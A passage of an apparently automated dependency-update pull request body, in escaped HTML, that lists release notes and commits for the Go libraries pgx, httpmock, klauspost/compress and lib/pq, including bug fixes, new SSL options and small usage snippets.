paths\u003c/li\u003e\n\u003cli\u003eClarify too many failed acquire attempts error message\u003c/li\u003e\n\u003cli\u003eBetter error wrapping with context and SQL statement (Aneesh Makala)\u003c/li\u003e\n\u003cli\u003eEnable govet and ineffassign linters (Federico Guerinoni)\u003c/li\u003e\n\u003cli\u003eGuard against various malformed binary messages (arrays, hstore, multirange, protocol messages)\u003c/li\u003e\n\u003cli\u003eFix various godoc comments (ferhat elmas)\u003c/li\u003e\n\u003cli\u003eFix typos in comments (Oleksandr Redko)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e5.8.0 (December 26, 2025)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/4e4eaedb47b7b3cfba0a1b0a9e6a3f015764f046\"\u003e\u003ccode\u003e4e4eaed\u003c/code\u003e\u003c/a\u003e Release v5.9.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/62731882651a90348febb43b2119b5f8bd9272de\"\u003e\u003ccode\u003e6273188\u003c/code\u003e\u003c/a\u003e Fix batch result format corruption when using cached prepared statements\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/f7b90c2f1ac099f00e67d6d4d0fee6deb330bc94\"\u003e\u003ccode\u003ef7b90c2\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/jackc/pgx/issues/2524\"\u003e#2524\u003c/a\u003e from dbussink/pipeline-result-format-reuse\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/3ce6d75be4baa8d1e4b4f880da5f9ad68ab14e7f\"\u003e\u003ccode\u003e3ce6d75\u003c/code\u003e\u003c/a\u003e Add failing test: batch scan corrupted in cache_statement mode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/b4d8e62b6616d0c09c5021500363de0c56e01631\"\u003e\u003ccode\u003eb4d8e62\u003c/code\u003e\u003c/a\u003e Release v5.9.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/c227cd4f76fa2b1a47c0156621e05c076f4cf5c9\"\u003e\u003ccode\u003ec227cd4\u003c/code\u003e\u003c/a\u003e Bump minimum Go version from 1.24 to 1.25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/f492c14836d7d442e8103b09f2c0c74a80c56347\"\u003e\u003ccode\u003ef492c14\u003c/code\u003e\u003c/a\u003e Use reflect.TypeFor instead of reflect.TypeOf for static types\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/ad8fb08d3f1a36c0e475c9f80dc9bb19d075d8e2\"\u003e\u003ccode\u003ead8fb08\u003c/code\u003e\u003c/a\u003e Use sync.WaitGroup.Go to simplify goroutine spawning\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/303377376df43ba3d1a99728eaa9f9a6bcaab767\"\u003e\u003ccode\u003e3033773\u003c/code\u003e\u003c/a\u003e Remove go1.26 build tag from synctest test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/83ffb3c2220737cf11c7dd88c80be9166753102f\"\u003e\u003ccode\u003e83ffb3c\u003c/code\u003e\u003c/a\u003e Validate multirange element count against source length before allocating\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jackc/pgx/compare/v5.7.5...v5.9.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/jarcoal/httpmock` from 1.4.0 to 1.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jarcoal/httpmock/releases\"\u003egithub.com/jarcoal/httpmock's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.4.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003etest: also test with go v1.25 and use golangci-lint v2.4.0 by \u003ca href=\"https://github.com/maxatome\"\u003e\u003ccode\u003e@​maxatome\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jarcoal/httpmock/pull/164\"\u003ejarcoal/httpmock#164\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid data race when closing body by \u003ca href=\"https://github.com/DavyJohnes\"\u003e\u003ccode\u003e@​DavyJohnes\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jarcoal/httpmock/pull/165\"\u003ejarcoal/httpmock#165\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DavyJohnes\"\u003e\u003ccode\u003e@​DavyJohnes\u003c/code\u003e\u003c/a\u003e made his first contribution in \u003ca href=\"https://redirect.github.com/jarcoal/httpmock/pull/165\"\u003ejarcoal/httpmock#165\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jarcoal/httpmock/compare/v1.4.0...v1.4.1\"\u003ehttps://github.com/jarcoal/httpmock/compare/v1.4.0...v1.4.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jarcoal/httpmock/commit/314d58a0690c92c71b2a9de2d62d52c74c328546\"\u003e\u003ccode\u003e314d58a\u003c/code\u003e\u003c/a\u003e fix: protect all body-related methods with mutext\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jarcoal/httpmock/commit/e482896659149810cdc8b9262611a0059150b661\"\u003e\u003ccode\u003ee482896\u003c/code\u003e\u003c/a\u003e fix: avoid data race when closing body\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jarcoal/httpmock/commit/c97714566220b6410cf4f7937db771d1876e8e98\"\u003e\u003ccode\u003ec977145\u003c/code\u003e\u003c/a\u003e test: also test with go v1.25 and use golangci-lint v2.4.0\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jarcoal/httpmock/compare/v1.4.0...v1.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/klauspost/compress` from 1.18.0 to 1.18.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/klauspost/compress/releases\"\u003egithub.com/klauspost/compress's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.18.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ezstd: Fix crash when changing encoder dictionary with same ID by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1135\"\u003eklauspost/compress#1135\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezstd: Default to full zero frames by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1134\"\u003eklauspost/compress#1134\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eflate: Clean up histogram order by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1133\"\u003eklauspost/compress#1133\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.4...v1.18.5\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.4...v1.18.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003egzhttp: Add zstandard to server handler wrapper by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1121\"\u003eklauspost/compress#1121\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezstd: Add ResetWithOptions to encoder/decoder by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1122\"\u003eklauspost/compress#1122\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003egzhttp: preserve qvalue when extra parameters follow in Accept-Encoding by \u003ca href=\"https://github.com/analytically\"\u003e\u003ccode\u003e@​analytically\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1116\"\u003eklauspost/compress#1116\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/analytically\"\u003e\u003ccode\u003e@​analytically\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1116\"\u003eklauspost/compress#1116\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ethaizone\"\u003e\u003ccode\u003e@​ethaizone\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1124\"\u003eklauspost/compress#1124\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/zwass\"\u003e\u003ccode\u003e@​zwass\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1125\"\u003eklauspost/compress#1125\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.2...v1.18.4\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.2...v1.18.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.3\u003c/h2\u003e\n\u003cp\u003eDownstream CVE-2025-61728\u003c/p\u003e\n\u003cp\u003eSee \u003ca href=\"https://redirect.github.com/golang/go/issues/77102\"\u003egolang/go#77102\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.2...v1.18.3\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.2...v1.18.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eflate: Fix invalid encoding on level 9 with single value input by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1115\"\u003eklauspost/compress#1115\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eflate: reduce stateless allocations by \u003ca href=\"https://github.com/RXamzin\"\u003e\u003ccode\u003e@​RXamzin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1106\"\u003eklauspost/compress#1106\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump github/codeql-action from 3.30.5 to 4.31.2 in the github-actions group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1111\"\u003eklauspost/compress#1111\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ccode\u003ev1.18.1\u003c/code\u003e is marked \u0026quot;retracted\u0026quot; due to invalid flate/zip/gzip encoding.\u003c/p\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/RXamzin\"\u003e\u003ccode\u003e@​RXamzin\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1106\"\u003eklauspost/compress#1106\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.1...v1.18.2\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.1...v1.18.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ezstd: Fix incorrect buffer size in dictionary encodes by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1059\"\u003eklauspost/compress#1059\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003es2: check for cap, not len of buffer in EncodeBetter/Best by \u003ca href=\"https://github.com/vdarulis\"\u003e\u003ccode\u003e@​vdarulis\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1080\"\u003eklauspost/compress#1080\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezstd: Add simple zstd EncodeTo/DecodeTo functions by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1079\"\u003eklauspost/compress#1079\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezlib: Avoiding extra allocation in zlib.reader.Reset by \u003ca href=\"https://github.com/travelpolicy\"\u003e\u003ccode\u003e@​travelpolicy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1086\"\u003eklauspost/compress#1086\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003egzhttp: remove redundant err check in zstdReader by \u003ca href=\"https://github.com/ryanfowler\"\u003e\u003ccode\u003e@​ryanfowler\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1090\"\u003eklauspost/compress#1090\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/c5e0077f50a3268a27b02816adc48ebfb535c65e\"\u003e\u003ccode\u003ec5e0077\u003c/code\u003e\u003c/a\u003e zstd: Fix encoder changing dictionary with same ID (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1135\"\u003e#1135\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/fd3f23e2d1d0fca18f38ee2dfedb73d0ca5b02e5\"\u003e\u003ccode\u003efd3f23e\u003c/code\u003e\u003c/a\u003e zstd: Default to full zero frames (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1134\"\u003e#1134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/8233c587ef6e7b0f5168bfc08e63ea37e97b2d36\"\u003e\u003ccode\u003e8233c58\u003c/code\u003e\u003c/a\u003e flate: Clean up histogram order (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1133\"\u003e#1133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/bcf0d1289c8df01178af919dd5d8ff83afaa5471\"\u003e\u003ccode\u003ebcf0d12\u003c/code\u003e\u003c/a\u003e build(deps): bump the github-actions group with 3 updates (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1132\"\u003e#1132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/cf758fe1c54e3049f302474d2a98afd3acc1a884\"\u003e\u003ccode\u003ecf758fe\u003c/code\u003e\u003c/a\u003e ci: Upgrade Go versions, clean up (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1130\"\u003e#1130\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/77cc5203de2eb0034a63eace182bb28aa869cb83\"\u003e\u003ccode\u003e77cc520\u003c/code\u003e\u003c/a\u003e Add v1.18.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/c03560f58ab1f595f17838b482483849d585d0c2\"\u003e\u003ccode\u003ec03560f\u003c/code\u003e\u003c/a\u003e zstd: Add ResetWithOptions to encoder/decoder (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1122\"\u003e#1122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/0874ab860fc90779cb032996aee0c9e11880738c\"\u003e\u003ccode\u003e0874ab8\u003c/code\u003e\u003c/a\u003e build(deps): bump the github-actions group with 3 updates (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1126\"\u003e#1126\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/4a368369aa67e1da850e9a38fbbbea7c20cfd377\"\u003e\u003ccode\u003e4a36836\u003c/code\u003e\u003c/a\u003e doc: Clarify documentation in readme (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1125\"\u003e#1125\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/4309644706928691448da21eaa03895b982e086c\"\u003e\u003ccode\u003e4309644\u003c/code\u003e\u003c/a\u003e zstd: document concurrency option handling in encoder (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1124\"\u003e#1124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.0...v1.18.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/lib/pq` from 1.10.9 to 1.12.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lib/pq/releases\"\u003egithub.com/lib/pq's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.12.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSend datestyle startup parameter, improving compatbility with database engines that use a different default datestyle such as EnterpriseDB (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1312\"\u003e#1312\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1312\"\u003e#1312\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1312\"\u003elib/pq#1312\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eTreat io.ErrUnexpectedEOF as driver.ErrBadConn so database/sql discards the connection. Since v1.12.0 this could result in permanently broken connections, especially with CockroachDB which frequently sends partial messages (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1299\"\u003e#1299\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1299\"\u003e#1299\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1299\"\u003elib/pq#1299\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eLook for pgpass file in ~/.pgpass instead of ~/.postgresql/pgpass (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDon't clear password if directly set on pq.Config (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1300\"\u003elib/pq#1300\u003c/a\u003e\n\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1302\"\u003elib/pq#1302\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eThe next release may change the default sslmode from \u003ccode\u003erequire\u003c/code\u003e to \u003ccode\u003eprefer\u003c/code\u003e. See \u003ca href=\"https://redirect.github.com/lib/pq/issues/1271\"\u003e#1271\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eCopyIn()\u003c/code\u003e and \u003ccode\u003eCopyInToSchema()\u003c/code\u003e have been marked as deprecated. These are simple query builders and not needed for \u003ccode\u003eCOPY [..] FROM STDIN\u003c/code\u003e support (which is \u003cem\u003enot\u003c/em\u003e deprecated). (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1279\"\u003e#1279\u003c/a\u003e)\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e// Old\r\ntx.Prepare(CopyIn(\u0026quot;temp\u0026quot;, \u0026quot;num\u0026quot;, \u0026quot;text\u0026quot;, \u0026quot;blob\u0026quot;, \u0026quot;nothing\u0026quot;))\r\n\u003cp\u003e// Replacement\ntx.Prepare(\u003ccode\u003ecopy temp (num, text, blob, nothing) from stdin\u003c/code\u003e)\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eSupport protocol 3.2, and the \u003ccode\u003emin_protocol_version\u003c/code\u003e and \u003ccode\u003emax_protocol_version\u003c/code\u003e DSN parameters (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1258\"\u003e#1258\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003esslmode=prefer\u003c/code\u003e and \u003ccode\u003esslmode=allow\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1270\"\u003e#1270\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003essl_min_protocol_version\u003c/code\u003e and \u003ccode\u003essl_max_protocol_version\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1277\"\u003e#1277\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport connection service file to load connection details (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1285\"\u003e#1285\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003esslrootcert=system\u003c/code\u003e and use \u003ccode\u003e~/.postgresql/root.crt\u003c/code\u003e as the default value of sslrootcert (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1280\"\u003e#1280\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/lib/pq/issues/1281\"\u003e#1281\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd a new \u003ccode\u003epqerror\u003c/code\u003e package with PostgreSQL error codes (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1275\"\u003e#1275\u003c/a\u003e).\u003c/p\u003e\n\u003cp\u003eFor example, to test if an error is a UNIQUE constraint violation:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003eif pqErr, ok := errors.AsType[*pq.Error](https://github.com/lib/pq/blob/HEAD/err); ok \u0026amp;\u0026amp; pqErr.Code == pqerror.UniqueViolation {\r\n    log.Fatalf(\u0026quot;email %q already exsts\u0026quot;, email)\r\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eTo make this a bit more convenient, it also adds a \u003ccode\u003epq.As()\u003c/code\u003e function:\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lib/pq/blob/master/CHANGELOG.md\"\u003egithub.com/lib/pq's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.12.3 (2026-04-03)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSend datestyle startup parameter, improving compatbility with database engines\nthat use a different default datestyle such as EnterpriseDB (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1312\"\u003e#1312\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1312\"\u003e#1312\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1312\"\u003elib/pq#1312\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.2 (2026-04-02)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eTreat io.ErrUnexpectedEOF as driver.ErrBadConn so database/sql discards the\nconnection. Since v1.12.0 this could result in permanently broken connections,\nespecially with CockroachDB which frequently sends partial messages (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1299\"\u003e#1299\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1299\"\u003e#1299\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1299\"\u003elib/pq#1299\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.1 (2026-03-30)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eLook for pgpass file in ~/.pgpass instead of ~/.postgresql/pgpass (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDon't clear password if directly set on pq.Config (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1300\"\u003elib/pq#1300\u003c/a\u003e\n\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1302\"\u003elib/pq#1302\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.0 (2026-03-18)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eThe next release may change the default sslmode from \u003ccode\u003erequire\u003c/code\u003e to \u003ccode\u003eprefer\u003c/code\u003e.\nSee \u003ca href=\"https://redirect.github.com/lib/pq/issues/1271\"\u003e#1271\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eCopyIn()\u003c/code\u003e and \u003ccode\u003eCopyInToSchema()\u003c/code\u003e have been marked as deprecated. These are\nsimple query builders and not needed for \u003ccode\u003eCOPY [..] FROM STDIN\u003c/code\u003e support (which\nis \u003cem\u003enot\u003c/em\u003e deprecated). (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1279\"\u003e#1279\u003c/a\u003e)\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e// 